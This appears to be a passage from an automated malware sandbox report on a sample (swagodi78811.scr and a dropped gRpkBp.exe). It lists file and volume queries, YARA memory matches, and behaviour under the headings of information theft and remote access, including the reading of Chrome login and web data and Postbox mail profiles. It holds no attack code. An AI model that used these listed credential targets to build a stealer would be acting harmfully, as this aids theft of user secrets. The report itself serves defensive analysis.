Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Queries volume information: C:\Users\user\AppData\Roaming\swagodi78811.scr VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Queries volume information: C:\Users\user\AppData\Roaming\gRpkBp.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Queries volume information: C:\Users\user\AppData\Roaming\gRpkBp.exe VolumeInformation

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Source: Yara match	File source: 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: swagodi78811.scr PID: 3468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: swagodi78811.scr PID: 3880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gRpkBp.exe PID: 2060, type: MEMORYSTR

Source: Yara match	File source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: swagodi78811.scr PID: 3468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: swagodi78811.scr PID: 3880, type: MEMORYSTR

Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Source: Yara match	File source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.663140063.000000000043C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: swagodi78811.scr PID: 3468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: swagodi78811.scr PID: 3880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gRpkBp.exe PID: 2060, type: MEMORYSTR

Remote Access Functionality

Source: Yara match	File source: 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: swagodi78811.scr PID: 3468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: swagodi78811.scr PID: 3880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gRpkBp.exe PID: 2060, type: MEMORYSTR

Source: Yara match	File source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: swagodi78811.scr PID: 3468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: swagodi78811.scr PID: 3880, type: MEMORYSTR